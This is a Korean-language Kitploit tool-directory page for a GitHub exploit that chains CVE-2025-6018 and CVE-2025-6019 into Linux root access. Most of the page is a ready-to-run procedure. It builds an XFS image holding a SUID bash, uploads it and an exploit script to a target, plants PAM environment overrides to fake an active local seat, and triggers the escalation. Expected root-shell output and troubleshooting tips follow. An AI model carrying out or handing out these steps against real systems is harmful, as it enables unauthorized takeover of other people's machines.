Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/muyuanlove/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingRed TeamingBinary Exploitation
GitHubmuyuanlove/cve-2025-6018-cve-2025-6019-privilege-escalation-exploit

CVE-2025-6018-CVE-2025-6019-Privilege-Escalation-Exploit

CVE-2025-6018 + CVE-2025-6019 Privilege Escalation Exploit

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
1216개월 전아직 검토되지 않음

CVE-2025-6018 + CVE-2025-6019 권한 상승 가이드

中文

📋 빠른 익스플로잇 단계

1단계: XFS 이미지 준비 (로컬 머신)

root@kitploit:~
# 300MB XFS 이미지 생성
dd if=/dev/zero of=xfs.image bs=1M count=300
mkfs.xfs -f xfs.image

# 마운트 및 SUID bash 설치
mkdir mnt
sudo mount -t xfs xfs.image mnt
sudo cp /bin/bash mnt/bash
sudo chmod 4755 mnt/bash
sudo umount mnt
rmdir mnt

# 확인 (300M가 표시되어야 함)
ls -lh xfs.image

2단계: 대상에 파일 업로드

root@kitploit:~
# 익스플로잇 스크립트 및 이미지 업로드
scp exp.sh [email protected]:~/
scp xfs.image [email protected]:~/

3단계: 첫 번째 로그인 - PAM 구성

root@kitploit:~
# SSH 로그인
ssh [email protected]

# PAM 환경 변수 작성
cat > ~/.pam_environment << 'EOF'
XDG_SEAT OVERRIDE=seat0
XDG_VTNR OVERRIDE=1
EOF

# 구성 확인
cat ~/.pam_environment

# 🔥 중요: 로그아웃 (PAM 설정 활성화를 위해)
exit

4단계: 두 번째 로그인 - 권한 상승 실행

root@kitploit:~
# SSH 재로그인 (PAM 설정이 활성화됨)
ssh [email protected]

# PAM 활성화 확인 (('yes',) 반환되어야 함)
gdbus call --system --dest org.freedesktop.login1 \
    --object-path /org/freedesktop/login1 \
    --method org.freedesktop.login1.Manager.CanReboot

# 권한 상승 스크립트 실행
bash exp.sh

✅ 성공 지표

익스플로잇이 성공하면 다음이 표시됩니다:

root@kitploit:~
✓ SUID bash found: /tmp/blockdev_loop0_xfs_xxxxx/bash
✓ Root access confirmed!

════════════════════════════════════════════════════════════
║ 루트 플래그                                              ║
║ <flag_here>                                             ║
════════════════════════════════════════════════════════════

bash-5.2# whoami
root

🔧 문제 해결

문제해결 방법
CanReboot가 ('no',) 반환로그아웃 후 다시 로그인했는지 확인 (3단계)
오류

📌 주요 사항

  • ✅ 반드시 로그아웃 후 재로그인: PAM 설정은 새 세션에서만 적용됩니다.
  • ✅ CanReboot 확인: 스크립트 실행 전에 ('yes',) 반환을 확인하세요.
  • ✅ SSH 로그인 사용: ssh -t user@host "cmd" 스타일 실행을 사용하지 마세요.

🐱 고양이 수호자

실패하면 모든 단계를 엄격한 순서로 실행했는지 확인하세요!

도구 다운로드
Not authorized
~/.pam_environment 내용이 올바른지 확인
SUID bash를 찾을 수 없음xfs.image를 다시 업로드하고 SUID 비트가 설정되었는지 확인